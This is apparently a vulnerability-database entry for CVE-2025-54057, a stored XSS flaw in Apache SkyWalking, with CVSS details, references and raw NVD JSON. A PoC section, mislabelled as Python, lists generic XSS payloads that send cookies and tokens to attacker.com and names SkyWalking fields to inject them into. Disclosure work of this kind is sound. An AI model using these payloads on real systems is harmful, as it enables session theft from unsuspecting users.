Security Vulnerability Report
中文
CVE-2025-54057 CVSS 6.1 MEDIUM

CVE-2025-54057

Published: 2025-11-27 12:15:47
Last Modified: 2026-04-13 16:16:24

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache SkyWalking. This issue affects Apache SkyWalking: <= 10.2.0. Users are recommended to upgrade to version 10.3.0, which fixes the issue.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* - VULNERABLE
Apache SkyWalking <= 10.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-54057 PoC - Apache SkyWalking Stored XSS --> <!-- This PoC demonstrates the XSS vulnerability in Apache SkyWalking --> <!-- Target: Apache SkyWalking <= 10.2.0 --> <!-- Method 1: Using script tag --> <script>alert(document.cookie)</script> <!-- Method 2: Using img onerror handler --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- Method 3: Using SVG element --> <svg/onload=fetch('https://attacker.com/log?data='+localStorage.getItem('token'))> <!-- Method 4: Using iframe --> <iframe src="javascript:fetch('https://attacker.com/xss?c='+document.cookie)"> <!-- Method 5: Using event handlers --> <body onload="fetch('https://attacker.com/cookie?c='+btoa(document.cookie))"> <div onclick="fetch('https://attacker.com/click?x='+Math.random())">Click me</div> <!-- Attacker would inject one of these payloads into: --> <!-- - Service names --> <!-- - Endpoint descriptions --> <!-- - Log messages --> <!-- - Trace annotations --> <!-- - User-defined tags --> <!-- After injection, any user viewing the affected page will execute the malicious script -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54057", "sourceIdentifier": "[email protected]", "published": "2025-11-27T12:15:47.253", "lastModified": "2026-04-13T16:16:24.293", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache SkyWalking.\n\nThis issue affects Apache SkyWalking: <= 10.2.0.\n\nUsers are recommended to upgrade to version 10.3.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.3.0", "matchCriteriaId": "802C6A2F-36AC-40A6-AE35-9BD58BFC462A"}]}]}], "references": [{"url": "https://lists.apache.org/thread/sl2x2tx8y007x0mo746yddx2lvnv9tcr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/27/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/13/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}